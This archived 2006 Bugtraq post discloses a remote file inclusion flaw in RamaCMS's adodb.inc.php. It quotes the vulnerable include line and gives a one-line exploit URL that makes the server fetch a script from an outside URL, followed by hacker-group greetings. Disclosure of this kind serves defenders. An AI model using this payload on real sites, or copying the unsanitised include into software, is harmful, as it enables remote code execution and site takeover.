lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061012192645.24853.qmail@securityfocus.com>
Date: 12 Oct 2006 19:26:45 -0000
From: Le.CoPrA@...mail.com
To: bugtraq@...urityfocus.com
Subject: RamaCMS (adodb.inc.php) Remote File Inclue Vulnerability

=====================================================================

 # RamaCMS (adodb.inc.php) Remote File Inclue Vulnerability

=====================================================================

 # Author : Le CoPrA

=====================================================================

 # Download Script : http://www.linkini.net/phpscripts/descargas/Portales%20PHP%20(13%20Archivos)/RamaCMS.zip

=====================================================================

 # Vuln Code :

       
		include_once($path);
		$class = "ADODB2_$drivername";

 =====================================================================

 # Exploit :

          http://www.victim.com/[path]/adodb/adodb.inc.php?path=|SCRIPT-URL|

 =====================================================================

   # Discovered by : Le CoPrA

   # ConTaCT  :  Le.CoPrA |at| Hotmail |dot| CoM

   # Special Greetz FlyinG 2 || Str0ke ||

   # Greetz4// alkasrgolden, LovER BoY, Saudi Hackrz, HACKERS PAL, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
             3theaby geer,Mohajer22,Qaher_Yhod,MR.WOLF,cRiMiNaL NeT,al3iznet,Abdullah-00 ,DaRk-MaN,ToOoFA,KaBaRa

   # Channel : wWw.TrYaG.cOm/vb  || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com

===========================================================================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ